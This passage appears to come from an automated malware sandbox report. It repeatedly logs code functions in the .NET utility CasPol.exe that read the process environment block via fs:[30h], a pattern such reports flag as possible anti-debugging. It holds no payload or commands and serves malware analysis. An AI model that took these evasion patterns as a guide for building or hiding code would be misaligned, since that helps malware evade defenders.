          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013ED294 mov eax, dword ptr fs:[00000030h]1_2_013ED294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013ED294 mov eax, dword ptr fs:[00000030h]1_2_013ED294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E2AE4 mov eax, dword ptr fs:[00000030h]1_2_013E2AE4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E2ACB mov eax, dword ptr fs:[00000030h]1_2_013E2ACB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01433540 mov eax, dword ptr fs:[00000030h]1_2_01433540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]1_2_013E4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]1_2_013E4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]1_2_013E4D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01463D40 mov eax, dword ptr fs:[00000030h]1_2_01463D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BAD30 mov eax, dword ptr fs:[00000030h]1_2_013BAD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DC577 mov eax, dword ptr fs:[00000030h]1_2_013DC577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DC577 mov eax, dword ptr fs:[00000030h]1_2_013DC577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D7D50 mov eax, dword ptr fs:[00000030h]1_2_013D7D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0143A537 mov eax, dword ptr fs:[00000030h]1_2_0143A537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01488D34 mov eax, dword ptr fs:[00000030h]1_2_01488D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F3D43 mov eax, dword ptr fs:[00000030h]1_2_013F3D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147E539 mov eax, dword ptr fs:[00000030h]1_2_0147E539
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436DC9 mov ecx, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]1_2_013E1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]1_2_013E1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]1_2_013E1DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E35A1 mov eax, dword ptr fs:[00000030h]1_2_013E35A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EFD9B mov eax, dword ptr fs:[00000030h]1_2_013EFD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EFD9B mov eax, dword ptr fs:[00000030h]1_2_013EFD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01468DF1 mov eax, dword ptr fs:[00000030h]1_2_01468DF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CD5E0 mov eax, dword ptr fs:[00000030h]1_2_013CD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CD5E0 mov eax, dword ptr fs:[00000030h]1_2_013CD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014805AC mov eax, dword ptr fs:[00000030h]1_2_014805AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014805AC mov eax, dword ptr fs:[00000030h]1_2_014805AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EBC2C mov eax, dword ptr fs:[00000030h]1_2_013EBC2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144C450 mov eax, dword ptr fs:[00000030h]1_2_0144C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144C450 mov eax, dword ptr fs:[00000030h]1_2_0144C450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]1_2_0148740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]1_2_0148740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]1_2_0148740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013D746D mov eax, dword ptr fs:[00000030h]1_2_013D746D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EA44B mov eax, dword ptr fs:[00000030h]1_2_013EA44B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01488CD6 mov eax, dword ptr fs:[00000030h]1_2_01488CD6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C849B mov eax, dword ptr fs:[00000030h]1_2_013C849B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]1_2_01436CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]1_2_01436CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]1_2_01436CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014714FB mov eax, dword ptr fs:[00000030h]1_2_014714FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB73D mov eax, dword ptr fs:[00000030h]1_2_013DB73D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DB73D mov eax, dword ptr fs:[00000030h]1_2_013DB73D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EE730 mov eax, dword ptr fs:[00000030h]1_2_013EE730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B4F2E mov eax, dword ptr fs:[00000030h]1_2_013B4F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013B4F2E mov eax, dword ptr fs:[00000030h]1_2_013B4F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01488F6A mov eax, dword ptr fs:[00000030h]1_2_01488F6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DF716 mov eax, dword ptr fs:[00000030h]1_2_013DF716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EA70E mov eax, dword ptr fs:[00000030h]1_2_013EA70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EA70E mov eax, dword ptr fs:[00000030h]1_2_013EA70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0148070D mov eax, dword ptr fs:[00000030h]1_2_0148070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0148070D mov eax, dword ptr fs:[00000030h]1_2_0148070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144FF10 mov eax, dword ptr fs:[00000030h]1_2_0144FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144FF10 mov eax, dword ptr fs:[00000030h]1_2_0144FF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CFF60 mov eax, dword ptr fs:[00000030h]1_2_013CFF60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013CEF40 mov eax, dword ptr fs:[00000030h]1_2_013CEF40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C8794 mov eax, dword ptr fs:[00000030h]1_2_013C8794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F37F5 mov eax, dword ptr fs:[00000030h]1_2_013F37F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]1_2_01437794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]1_2_01437794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]1_2_01437794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147AE44 mov eax, dword ptr fs:[00000030h]1_2_0147AE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0147AE44 mov eax, dword ptr fs:[00000030h]1_2_0147AE44
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BE620 mov eax, dword ptr fs:[00000030h]1_2_013BE620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EA61C mov eax, dword ptr fs:[00000030h]1_2_013EA61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013EA61C mov eax, dword ptr fs:[00000030h]1_2_013EA61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]1_2_013BC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]1_2_013BC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]1_2_013BC600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E8E00 mov eax, dword ptr fs:[00000030h]1_2_013E8E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]1_2_013DAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]1_2_013DAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]1_2_013DAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]1_2_013DAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]1_2_013DAE73
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01471608 mov eax, dword ptr fs:[00000030h]1_2_01471608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C766D mov eax, dword ptr fs:[00000030h]1_2_013C766D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0146FE3F mov eax, dword ptr fs:[00000030h]1_2_0146FE3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]1_2_013C7E41
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0146FEC0 mov eax, dword ptr fs:[00000030h]1_2_0146FEC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01488ED6 mov eax, dword ptr fs:[00000030h]1_2_01488ED6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0144FE87 mov eax, dword ptr fs:[00000030h]1_2_0144FE87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E16E0 mov ecx, dword ptr fs:[00000030h]1_2_013E16E0
